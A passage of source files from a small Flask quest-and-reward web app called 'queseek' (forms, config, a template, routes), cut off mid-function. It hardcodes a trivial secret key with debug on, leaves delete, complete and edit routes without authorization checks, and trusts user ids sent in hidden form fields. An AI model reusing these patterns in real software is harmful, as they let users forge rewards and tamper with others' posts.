"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField, IntegerField, validators, SelectField, HiddenField\nfrom wtforms.widgets import TextArea\nfrom wtforms.validators import DataRequired\n\n\nclass LoginForm(FlaskForm):\n username = StringField('Username')\n password = PasswordField('Password')\n submit = SubmitField('Login')\n\n def validate_username(self, username):\n pass\n\n def validate_email(self, email):\n pass\n\n\nclass SignUpForm(FlaskForm):\n email = StringField('Email')\n username = StringField('Username')\n password = PasswordField('New Password', [\n validators.DataRequired()\n ])\n confirm = PasswordField('Repeat Password', [\n validators.DataRequired()\n ])\n submit = SubmitField('Sign Up')\n update = SubmitField('Update')\n\n\nclass QuestForm(FlaskForm):\n\n type = SelectField(\"Type: \", choices=[(0, \"Hero Quest (Lost an item)\"), (1, \"Side Quest (Errand)\")], default=0)\n item = StringField('Item:', [\n validators.DataRequired()\n ])\n location = StringField('Location:', [\n validators.DataRequired()\n ])\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')\n\n\nclass SeekForm(FlaskForm):\n\n item = StringField('Item:', [\n validators.DataRequired()\n ])\n location = StringField('Location:', [\n validators.DataRequired()\n ])\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')\n\n\nclass QuestCommentsForm(FlaskForm):\n questId = HiddenField('questId:')\n userId = HiddenField('userId:')\n is_creator = HiddenField('is_creator:')\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')\n\n\nclass SeekCommentsForm(FlaskForm):\n seekId = HiddenField('seekId:')\n userId = HiddenField('userId:')\n is_creator = HiddenField('is_creator:')\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')"
},
{
"alpha_fraction": 0.6414633989334106,
"alphanum_fraction": 0.70243901014328,
"avg_line_length": 26.266666412353516,
"blob_id": "04d59b6809ec7386cee5ed5520f83df86d9b21dd",
"content_id": "62fba328769aa7b4fe9ef95f56eefdc8fdcbabab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 15,
"path": "/app/config.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "import os\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\nDEBUG = True\n\nSECRET_KEY = '123456789'\nDATABASE_FILE = 'UserDatabase.db'\nSQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(os.path.join(BASE_DIR, DATABASE_FILE))\nDATABASE_CONNECT_OPTIONS = {}\n\n#INTERNAL_URL = 'http://192.168.142.136:5000/'\n\n#UPLOAD_FOLDER = \"{}\".format(os.path.join(BASE_DIR, 'uploads/'))\n\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n"
},
{
"alpha_fraction": 0.36656609177589417,
"alphanum_fraction": 0.37328580021858215,
"avg_line_length": 41.15976333618164,
"blob_id": "4fab06f27927bef7fec4285ca44905022e24e2ec",
"content_id": "519514539b49ab6414866745ce1d320afbaab200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7292,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 169,
"path": "/app/templates/quest.html",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\r\n<html lang=\"zxx\">\r\n\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"description\" content=\"Queseek\">\r\n <meta name=\"keywords\" content=\"Queseek, quest, seek\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\r\n <title>Queseek</title>\r\n {% include \"base/icon.html\" %}\r\n <!-- Google Font -->\r\n <link href=\"https://fonts.googleapis.com/css?family=Muli:300,400,500,600,700,800,900&display=swap\" rel=\"stylesheet\">\r\n\r\n <!-- Css Styles -->\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/bootstrap.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/font-awesome.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/themify-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/elegant-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/owl.carousel.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/nice-select.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/jquery-ui.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/slicknav.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/style.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/table.css')}}\" type=\"text/css\">\r\n</head>\r\n\r\n<body>\r\n\r\n\r\n<!-- Page Preloder -->\r\n<div id=\"preloder\">\r\n <div class=\"loader\"></div>\r\n</div>\r\n\r\n<!-- Header Section Begin -->\r\n<header class=\"header-section\">\r\n\r\n {% include \"base/topbar.html\" %}\r\n {% include \"base/menu.html\" %}\r\n\r\n</header>\r\n<!-- Header End -->\r\n\r\n\r\n<!-- Hero Section Begin -->\r\n<section class=\"hero-section\">\r\n <div class=\"hero-items\">\r\n\r\n <div class=\"topbar-cover2\">\r\n <div class=\"desc\">\r\n\r\n <section class=\"cd-faq\">\r\n\r\n\r\n <div class=\"cd-faq-categories\">\r\n\r\n {% if page == 'sq' %}\r\n <a href=\"{{url_for('hero_quests')}}\">Hero Quests</a>\r\n <a class=\"active\" href=\"{{url_for('side_quests')}}\">Side Quests</a>\r\n\r\n {% else %}\r\n <a class=\"active\" href=\"{{url_for('hero_quests')}}\">Hero Quests</a>\r\n <a href=\"{{url_for('side_quests')}}\">Side Quests</a>\r\n\r\n {% endif %}\r\n </div>\r\n\r\n <!-- Shopping Cart Section Begin -->\r\n <section class=\"shopping-cart spad\">\r\n\r\n <div class=\"blog-details-inner\">\r\n <div class=\"blog-detail-title\"><h2>\r\n {% if page == 'sq' %}\r\n Side Quests\r\n {% else %}\r\n Hero Quests\r\n {% endif %}\r\n </h2>\r\n\r\n </div>\r\n </div>\r\n\r\n <div class=\"center-button\">\r\n {% include \"base/button.html\" %}\r\n </div>\r\n <div class=\"container\">\r\n <div class=\"row\">\r\n <div class=\"col-lg-12\">\r\n <div class=\"cart-table\">\r\n <table>\r\n <thead>\r\n <tr>\r\n <th>Reward</th>\r\n <th>Quest ID</th>\r\n <th>Item</th>\r\n <th>Description</th>\r\n <th>Username</th>\r\n <th>Date Posted</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n\r\n {% for row in rows %}\r\n <tr>\r\n <td class=\"cart-pic\"><h5>{{ row[1].reward }}</h5></td>\r\n <td class=\"cart-pic\">\r\n <h5>\r\n <a href='/quest/{{row[1].questId}}'>{{row[1].questId}}</a>\r\n </h5>\r\n 
</td>\r\n <td class=\"cart-pic\">{{ row[1].item }}</td>\r\n <td class=\"cart-pic\">\r\n\r\n {% if row[1].description|length > 50 %}\r\n {{ row[1].description[:50] + '...'}}\r\n\r\n {% else %}\r\n {{ row[1].description }}\r\n\r\n {% endif %}\r\n\r\n </td>\r\n <td class=\"cart-pic\">{{ row[0].username }}</td>\r\n <td class=\"cart-pic\">{{ row[1].posted_at.strftime('%d/%m/%Y %I:%M %p')\r\n }}\r\n </td>\r\n\r\n </tr>\r\n\r\n {% endfor %}\r\n\r\n </tbody>\r\n </table>\r\n </div>\r\n\r\n </div>\r\n </div>\r\n </div>\r\n </section>\r\n <!-- Shopping Cart Section End -->\r\n\r\n </section>\r\n\r\n\r\n </div>\r\n </div>\r\n\r\n\r\n </div>\r\n</section>\r\n\r\n\r\n<!-- Hero Section End -->\r\n\r\n<!-- Js Plugins -->\r\n<script src=\"{{url_for('static', filename='js/jquery-3.3.1.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/bootstrap.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery-ui.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.countdown.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.nice-select.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.zoom.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.dd.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.slicknav.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/main.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/table.js')}}\"></script>\r\n</body>\r\n\r\n</html>"
},
{
"alpha_fraction": 0.7128205299377441,
"alphanum_fraction": 0.7153846025466919,
"avg_line_length": 24.161291122436523,
"blob_id": "c058f5ed55e7e9fbaa6be3bce7589bd4de818f77",
"content_id": "4a8ca22fdde12f56b8fbb0025d176f3e26929a7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 780,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 31,
"path": "/app/bp_events/controllers.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, render_template, jsonify, request\nfrom flask_login import login_required\n#from app.bp_events.forms import CreateEvent\nfrom app import app\n\n\nevents = Blueprint('events', __name__, template_folder='templates')\n\n#@events.route('/')\n#def events_home():\n#\treturn \"events homepage\"\n\n#@events.route('/')\n#def events_home():\n#\treturn render_template('events/list.html')\n\n#@events.route('/')\n#def events_home():\n#\treturn render_template('events/date.html', myname=\"anyu\")\n\t#return render_template('events/listv2.html', myname=\"anyu\")\n\[email protected]('/')\ndef events_home():\n\treturn render_template('events/listv3.html', myname=\"anyu\")\n\t\n\[email protected]('/create')\n@login_required\ndef events_create():\n\tform = CreateEvent()\n\treturn render_template('events/create.html', form=form)\n"
},
{
"alpha_fraction": 0.5589882731437683,
"alphanum_fraction": 0.5656428933143616,
"avg_line_length": 33.20185470581055,
"blob_id": "92012f01534986a672c73cf397dbfab7f64a8f69",
"content_id": "4c4006d24e26bb8129acbf8e78ffa93bf7ea56a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33210,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 971,
"path": "/app/__init__.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask import Flask, url_for, redirect, render_template, request, abort, send_from_directory, flash, session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import exists, func, update\nfrom sqlalchemy.orm import aliased\nfrom flask_login import LoginManager, UserMixin, current_user, login_user, logout_user, login_required\nimport random\nimport re\nfrom sqlalchemy import desc, asc\nfrom datetime import datetime\nimport pytz\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\n\ndb = SQLAlchemy(app)\nlogin = LoginManager(app)\nlogin.login_view = 'login'\n\n\[email protected]_loader\ndef load_user(id):\n return User.query.get(id)\n\n\nclass Base(db.Model):\n __abstract__ = True\n\n def add(self):\n try:\n db.session.add(self)\n self.save()\n except:\n db.session.rollback()\n\n def save(self):\n try:\n db.session.commit()\n except:\n db.session.rollback()\n\n def delete(self):\n try:\n db.session.delete(self)\n self.save()\n except:\n pass\n\n\nfrom app.bp_events.controllers import events\nfrom app.bp_api.controllers import api\n\napp.register_blueprint(events, url_prefix=\"/events\")\napp.register_blueprint(api, url_prefix=\"/api\")\n\nfrom app.models import User, UserProfile\nfrom app.models import Quest, QuestsAccepted, QuestCoinsTransaction, QuestComments\nfrom app.models import Seek, SeeksAccepted, SeekCoinsTransaction, SeekComments\nfrom app.models import Avatars, UserAvatars\nfrom app.forms import LoginForm, SignUpForm, QuestForm, SeekForm, QuestCommentsForm, SeekCommentsForm\n\ndb.create_all()\n\n\[email protected]_processor\ndef inject_dict_for_all_templates():\n if (not current_user.is_anonymous):\n userprofile = (db.session.query(UserProfile)\n .filter(UserProfile.id == current_user.id)\n .first()\n )\n return dict(current_user_avatar=userprofile.avatarId)\n\n return dict()\n\n\[email protected]('/complete/<id>', methods=[\"POST\"])\ndef complete(id):\n if request.method == 'POST':\n user = User.query.filter_by(id=request.form['user']).first()\n userProfile = UserProfile.query.filter_by(id=user.id).first()\n\n if id.startswith('Q'):\n q = Quest.query.filter_by(questId=id).first()\n reward = q.reward\n\n # add user to questsCompleted table\n questTransaction = QuestCoinsTransaction(questId=id, userId=user.id, coins=reward,\n completed_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(questTransaction)\n db.session.commit()\n\n coinsBefore = userProfile.coinsCollected\n\n # give reward to user\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"coinsBalance\": (UserProfile.coinsBalance + reward)})\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"coinsCollected\": (UserProfile.coinsCollected + reward)})\n\n coinsAfter = userProfile.coinsCollected\n coinsToNext = userProfile.coinsCollected % 20\n\n if (int(coinsAfter / 20) > int(coinsBefore / 20)):\n db.session.query(UserProfile).filter(UserProfile.id == user.id). \\\n update({\"level\": UserProfile.level + 1})\n\n if (coinsToNext == 0):\n coinsToNext = 20\n\n db.session.query(UserProfile).filter(UserProfile.id == user.id). 
\\\n update({\"coinsToNext\": coinsToNext})\n\n db.session.commit()\n\n return redirect(url_for('quest'))\n\n if id.startswith('S'):\n q = Seek.query.filter_by(seekId=id).first()\n\n # add user to questsCompleted table\n seekTransaction = SeekCoinsTransaction(seekId=id, userId=current_user.id,\n completed_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(seekTransaction)\n db.session.commit()\n\n # give reward to poster\n reward = q.reward\n\n db.session.query(UserProfile).filter(UserProfile.id == current_user.id). \\\n update({\"coinsBalance\": (UserProfile.coinsBalance + reward)})\n db.session.query(UserProfile).filter(UserProfile.id == current_user.id). \\\n update({\"coinsCollected\": (UserProfile.coinsCollected + reward)})\n db.session.commit()\n\n return redirect(url_for('seek'))\n\n\[email protected]('/delete/<id>', methods=[\"POST\"])\ndef delete(id):\n # print(id)\n if id.startswith('Q'):\n db.session.query(Quest).filter(Quest.questId == id).update({\"state\": 2})\n db.session.commit()\n return redirect(url_for('quest'))\n\n elif id.startswith('S'):\n db.session.query(Seek).filter(Seek.seekId == id).update({\"state\": 2})\n db.session.commit()\n return redirect(url_for('seek'))\n\n\[email protected]('/accept/<id>', methods=[\"POST\"])\ndef accept(id):\n if id.startswith('Q'):\n qa = QuestsAccepted(questId=id, userId=current_user.get_id())\n db.session.add(qa)\n db.session.commit()\n return redirect(url_for('home_quests_accepted'))\n\n\n elif id.startswith('S'):\n\n sa = SeeksAccepted(seekId=id, userId=current_user.get_id())\n db.session.add(sa)\n db.session.commit()\n return redirect(url_for('home_seeks_accepted'))\n return redirect(url_for('home'))\n\n\[email protected]('/forfeit/<id>', methods=[\"POST\"])\ndef forfeit(id):\n if id.startswith('Q'):\n qf = (db.session.query(User, QuestsAccepted)\n .filter(User.id == QuestsAccepted.userId)\n .filter(User.id == current_user.get_id())\n .filter(QuestsAccepted.questId == id)\n .first())\n\n db.session.delete(qf[1])\n db.session.commit()\n\n elif id.startswith('S'):\n sf = (db.session.query(User, SeeksAccepted)\n .filter(User.id == SeeksAccepted.userId)\n .filter(User.id == current_user.get_id())\n .filter(SeeksAccepted.seekId == id)\n .first())\n\n db.session.delete(sf[1])\n db.session.commit()\n\n return redirect(url_for('home'))\n\n\n# home\[email protected]('/')\ndef index():\n if (not current_user.is_anonymous):\n questsCreated = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.userId == current_user.get_id())\n .filter(Quest.state == 0)\n .order_by(Quest.posted_at.desc())\n .all())\n return render_template('index.html', rows=questsCreated, page='home')\n return render_template('index.html', rows=None, page='home')\n\n\[email protected]('/home')\ndef home():\n return index()\n\n\[email protected]('/home/YourQuests')\ndef home_your_quests():\n return index()\n\n\[email protected]('/home/YourSeeks')\ndef home_your_seeks():\n if (not current_user.is_anonymous):\n seeksCreated = (db.session.query(User, Seek)\n .filter(User.id == Seek.userId)\n .filter(Seek.userId == current_user.get_id())\n .order_by(Seek.posted_at.desc())\n .all())\n\n return render_template('index.html', rows=seeksCreated, page='ys')\n\n return index()\n\n\[email protected]('/home/QuestsAccepted')\ndef home_quests_accepted():\n if (not current_user.is_anonymous):\n questsAccepted = (db.session.query(User, Quest, QuestsAccepted)\n .filter(User.id == Quest.userId)\n .filter(QuestsAccepted.questId == Quest.questId)\n 
.filter(QuestsAccepted.userId == current_user.get_id())\n .order_by(Quest.posted_at.desc())\n .all())\n\n return render_template('index.html', rows=questsAccepted, page='qa')\n\n return index()\n\n\[email protected]('/home/SeeksAccepted')\ndef home_seeks_accepted():\n if (not current_user.is_anonymous):\n seeksAccepted = (db.session.query(User, Seek, SeeksAccepted)\n .filter(User.id == Seek.userId)\n .filter(SeeksAccepted.seekId == Seek.seekId)\n .filter(SeeksAccepted.userId == current_user.get_id())\n .order_by(Seek.posted_at.desc())\n .all())\n\n return render_template('index.html', rows=seeksAccepted, page='sa')\n\n return index()\n\n\[email protected]('/quest')\ndef quest():\n q = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.state == 0)\n .filter(Quest.type == 0)\n .order_by(Quest.posted_at.desc())\n .all())\n\n return render_template('quest.html', rows=q, page='quest')\n\n\[email protected]('/quest/HeroQuests')\ndef hero_quests():\n return redirect(url_for('quest'))\n\n\[email protected]('/quest/SideQuests')\ndef side_quests():\n q = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.state == 0)\n .filter(Quest.type == 1)\n .order_by(Quest.posted_at.desc())\n .all())\n return render_template('quest.html', rows=q, page='sq')\n\n\[email protected]('/quest/<id>')\ndef nextQuest(id):\n q = (db.session.query(User, Quest)\n .filter(User.id == Quest.userId)\n .filter(Quest.questId == id)\n .order_by(Quest.posted_at.desc())\n .first())\n\n # Get all that completed quest\n q1 = (db.session.query(User.id, User, QuestCoinsTransaction)\n .filter(QuestCoinsTransaction.questId == id)\n .filter(User.id == QuestCoinsTransaction.userId)\n .all()\n )\n\n q1id = (db.session.query(User.id)\n .filter(QuestCoinsTransaction.questId == id)\n .filter(User.id == QuestCoinsTransaction.userId)\n # .all()\n )\n\n # Get all users that accepted but not completed\n q2 = (db.session.query(User, QuestsAccepted)\n .filter(QuestsAccepted.questId == id)\n .filter(User.id == QuestsAccepted.userId)\n .filter(User.id.notin_(q1id))\n .all()\n )\n\n accepted = False\n completed = False\n\n if current_user.is_authenticated:\n # Check if current user already accepted quest\n acceptStatus = (db.session.query(User, QuestsAccepted)\n .filter(User.id == current_user.id)\n .filter(User.id == QuestsAccepted.userId)\n .filter(QuestsAccepted.questId == id)\n .first())\n\n if acceptStatus is not None:\n accepted = True\n\n # Check if current user already completed quest\n completeStatus = (db.session.query(User, QuestCoinsTransaction)\n .filter(User.id == current_user.id)\n .filter(User.id == QuestCoinsTransaction.userId)\n .filter(QuestCoinsTransaction.questId == id)\n .first())\n\n if completeStatus is not None:\n completed = True\n\n form = QuestCommentsForm()\n form.questId.data = id\n if current_user.is_authenticated:\n form.userId.data = current_user.id\n if (q[1].userId == current_user.id):\n form.is_creator.data = 1\n else:\n form.is_creator.data = 0\n\n comments = (db.session.query(QuestComments, User, UserProfile)\n .filter(User.id == QuestComments.userId)\n .filter(User.id == UserProfile.id)\n .filter(QuestComments.questId == id)\n .order_by(QuestComments.posted_at.desc())\n .all()\n )\n\n for i in comments:\n print('comments', i[0].posted_at)\n\n # print(comments[0])\n # print(comments[0][2].avatarId)\n return render_template('questDescription.html', quests=q, id=id,\n accepted=accepted, completed=completed,\n usersaccepted=q2, userscompleted=q1, 
comments=comments,\n form=form)\n\n\[email protected]('/questComment', methods=[\"POST\"])\ndef questComment():\n if request.method == 'POST':\n questId = request.form['questId']\n userId = request.form['userId']\n is_creator = request.form['is_creator']\n description = request.form['description']\n # assign id to comment\n already = True\n while already:\n commentId = questId + str(random.randint(1, 30000))\n # check if id exists in DB\n idcheck = (db.session.query(QuestComments.commentId)\n .filter(QuestComments.commentId == commentId)\n .order_by(QuestComments.posted_at.desc())\n .first()\n )\n if idcheck is None:\n already = False\n\n qc = QuestComments(commentId=commentId, questId=questId, userId=userId, description=description,\n is_creator=is_creator, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(qc)\n db.session.commit()\n return redirect(url_for('nextQuest', id=questId))\n\n\[email protected]('/seek')\ndef seek():\n q = (db.session.query(User, Seek)\n .filter(User.id == Seek.userId)\n .filter(Seek.state == 0)\n .order_by(Seek.posted_at.desc())\n .all())\n return render_template('seek.html', rows=q, page='seek')\n\n\[email protected]('/seek/<id>')\ndef nextSeek(id):\n q = (db.session.query(User, Seek)\n .filter(User.id == Seek.userId)\n .filter(Seek.seekId == id)\n .order_by(Seek.posted_at.desc())\n .first())\n\n # Get all that completed seek\n q1 = (db.session.query(User.id, User, SeekCoinsTransaction)\n .filter(SeekCoinsTransaction.seekId == id)\n .filter(User.id == SeekCoinsTransaction.userId)\n .all()\n )\n\n q1id = (db.session.query(User.id)\n .filter(SeekCoinsTransaction.seekId == id)\n .filter(User.id == SeekCoinsTransaction.userId)\n # .all()\n )\n\n # Get all users that accepted but not completed\n q2 = (db.session.query(User, SeeksAccepted)\n .filter(SeeksAccepted.seekId == id)\n .filter(User.id == SeeksAccepted.userId)\n .filter(User.id.notin_(q1id))\n .all()\n )\n\n accepted = False\n completed = False\n\n if current_user.is_authenticated:\n # Check if current user already accepted seek\n acceptStatus = (db.session.query(User, SeeksAccepted)\n .filter(User.id == current_user.id)\n .filter(User.id == SeeksAccepted.userId)\n .filter(SeeksAccepted.seekId == id)\n .first())\n\n if acceptStatus is not None:\n accepted = True\n\n # Check if current user already completed seek\n completeStatus = (db.session.query(User, SeekCoinsTransaction)\n .filter(User.id == current_user.id)\n .filter(User.id == SeekCoinsTransaction.userId)\n .filter(SeekCoinsTransaction.seekId == id)\n .first())\n\n if completeStatus is not None:\n completed = True\n\n form = SeekCommentsForm()\n form.seekId.data = id\n if current_user.is_authenticated:\n form.userId.data = current_user.id\n if (q[1].userId == current_user.id):\n form.is_creator.data = 1\n else:\n form.is_creator.data = 0\n\n comments = (db.session.query(SeekComments, User, UserProfile)\n .filter(User.id == SeekComments.userId)\n .filter(User.id == UserProfile.id)\n .filter(SeekComments.seekId == id)\n .order_by(SeekComments.posted_at.desc())\n .all())\n # print(comments[0])\n\n return render_template('seekDescription.html', seeks=q, id=id,\n accepted=accepted, completed=completed,\n usersaccepted=q2, userscompleted=q1, comments=comments, form=form)\n\n\[email protected]('/seekComment', methods=[\"POST\"])\ndef seekComment():\n if request.method == 'POST':\n seekId = request.form['seekId']\n userId = request.form['userId']\n is_creator = request.form['is_creator']\n description = request.form['description']\n # 
assign id to comment\n already = True\n while already:\n commentId = seekId + str(random.randint(1, 30000))\n # check if id exists in DB\n idcheck = (db.session.query(SeekComments.commentId)\n .filter(SeekComments.commentId == commentId)\n .order_by(SeekComments.posted_at.desc())\n .first()\n )\n if idcheck is None:\n already = False\n\n sc = SeekComments(commentId=commentId, seekId=seekId, userId=userId, description=description,\n is_creator=is_creator, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(sc)\n db.session.commit()\n return redirect(url_for('nextSeek', id=seekId))\n\n\[email protected]('/forms/quest', methods=[\"GET\", \"POST\"])\ndef forms_quest():\n form = LoginForm()\n form2 = QuestForm()\n if not current_user.is_authenticated:\n return render_template('login.html', form=form)\n\n if request.method == 'POST':\n\n # assign id to quest\n already = True\n while already:\n questId = 'Q' + str(random.randint(1, 10000))\n\n # check if seek exists in DB\n idcheck = (db.session.query(Quest.questId)\n .filter(Quest.questId == questId)\n .first()\n )\n if idcheck is None:\n already = False\n\n reward = 20\n item = request.form['item']\n location = request.form['location']\n description = request.form['description']\n type = request.form['type']\n user = User.query.filter_by(id=current_user.get_id()).first()\n\n quest = Quest(questId=questId, reward=reward,\n item=item, location=location,\n description=description, userId=user.id,\n type=type, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(quest)\n db.session.commit()\n return redirect(url_for('nextQuest', id=questId, code=307))\n\n else:\n return render_template('forms.html', form=form2)\n\n\[email protected]('/forms/seek', methods=[\"GET\", \"POST\"])\ndef forms_seek():\n form = LoginForm()\n form2 = QuestForm()\n if not current_user.is_authenticated:\n return render_template('login.html', form=form)\n\n if request.method == 'POST':\n\n # assign id to seek\n already = True\n while already:\n seekId = 'S' + str(random.randint(1, 10000))\n print(seekId)\n # check if seek exists in DB\n idcheck = (db.session.query(Seek.seekId)\n .filter(Seek.seekId == seekId)\n .first()\n )\n if idcheck is None:\n already = False\n\n reward = 20\n item = request.form['item']\n location = request.form['location']\n description = request.form['description']\n user = User.query.filter_by(id=current_user.get_id()).first()\n\n seek = Seek(seekId=seekId, reward=reward,\n item=item, location=location,\n description=description, userId=user.id, posted_at=datetime.now(pytz.timezone('Asia/Singapore')))\n db.session.add(seek)\n db.session.commit()\n return redirect(url_for('nextSeek', id=seekId, code=307))\n\n else:\n return render_template('forms.html', form=form2, page='sf')\n\n\[email protected]('/edit/<id>', methods=[\"GET\", \"POST\"])\ndef edit(id):\n # user = current_user\n if request.method == 'POST':\n\n try:\n # take form data\n item = request.form['item']\n location = request.form['location']\n description = request.form['description']\n\n print(id)\n if id.startswith('Q'):\n # make changes to Quest\n db.session.query(Quest) \\\n .filter(Quest.questId == id). \\\n update({\"item\": item})\n db.session.query(Quest) \\\n .filter(Quest.questId == id). \\\n update({\"location\": location})\n db.session.query(Quest) \\\n .filter(Quest.questId == id). 
\\\n update({\"description\": description})\n db.session.commit()\n print('cde')\n return redirect(url_for('nextQuest', id=id, code=307))\n\n elif id.startswith('S'):\n\n # make changes to Seek\n db.session.query(Seek) \\\n .filter(Seek.seekId == id). \\\n update({\"item\": item})\n db.session.query(Seek) \\\n .filter(Seek.seekId == id). \\\n update({\"location\": location})\n db.session.query(Seek) \\\n .filter(Seek.seekId == id). \\\n update({\"description\": description})\n db.session.commit()\n print('cde')\n return redirect(url_for('nextSeek', id=id, code=307))\n except:\n if id.startswith('Q'):\n quest = Quest.query.filter_by(questId=id).first()\n form = QuestForm()\n form.item.data = quest.item\n form.location.data = quest.location\n form.description.data = quest.description\n return render_template('edit.html', id=id, form=form, code=307)\n\n elif id.startswith('S'):\n print('error')\n seek = Seek.query.filter_by(seekId=id).first()\n form = SeekForm()\n form.item.data = seek.item\n form.location.data = seek.location\n form.description.data = seek.description\n return render_template('edit.html', id=id, form=form, code=307)\n\n\[email protected]('/faq')\ndef faq():\n return render_template('faq.html', page='faq')\n\n\[email protected]('/faq/general')\ndef faq_general():\n return redirect(url_for('faq'))\n\n\[email protected]('/faq/points_system')\ndef faq_points_system():\n return render_template('faq.html', page='points_system')\n\n\[email protected]('/faq/seekers')\ndef faq_seekers():\n return render_template('faq.html', page='seekers')\n\n\[email protected]('/leaderboard')\ndef leaderboard():\n # get all counts\n q1 = (db.session.query(User, func.count(QuestCoinsTransaction.questId).label('amt'))\n .group_by(User.id)\n .filter(User.id == QuestCoinsTransaction.userId)\n )\n q2 = q1.subquery()\n\n s1 = (db.session.query(User, func.count(SeekCoinsTransaction.seekId).label('amt'))\n .group_by(User.id)\n .filter(User.id == SeekCoinsTransaction.userId)\n )\n s2 = s1.subquery()\n\n # combine counts with user,userprofile\n q2 = (db.session.query(User, UserProfile, q2.c.amt, s2.c.amt)\n .outerjoin(q2, User.id == q2.c.id)\n .outerjoin(s2, User.id == s2.c.id)\n .filter(User.id == UserProfile.id)\n .order_by(UserProfile.coinsCollected.desc())\n .all()\n )\n\n print(q2)\n\n return render_template('leaderboard.html', query=q2, page='leaderboard')\n\n\[email protected]('/profile')\ndef profile():\n user = current_user\n userprofile = UserProfile.query.filter_by(id=user.id).first()\n return render_template('profile.html', user=user, userprofile=userprofile)\n\n\[email protected]('/profile/general')\ndef profile_general():\n return redirect(url_for('profile'))\n\n\[email protected]('/profile/avatars')\ndef profile_avatars():\n user = current_user\n userprofile = (db.session.query(UserProfile, Avatars)\n .filter(UserProfile.id == user.id)\n .filter(UserProfile.avatarId == Avatars.avatarId)\n .first()\n )\n\n print(userprofile)\n\n # UserProfile.query.filter_by(id=user.id).first()\n avatars = db.session.query(Avatars).all()\n ua = (db.session.query(UserAvatars.avatarId)\n .filter(user.id == UserAvatars.userId)\n .all())\n user_avatars = []\n for i in ua:\n user_avatars.append(i[0])\n\n return render_template('profile.html', user=user, userprofile=userprofile, page='avatars', avatars=avatars,\n user_avatars=user_avatars)\n\n\[email protected]('/profile/avatars/update/<avatarId>', methods=[\"GET\", \"POST\"])\ndef profile_avatars_update(avatarId):\n user = current_user\n if request.method == 
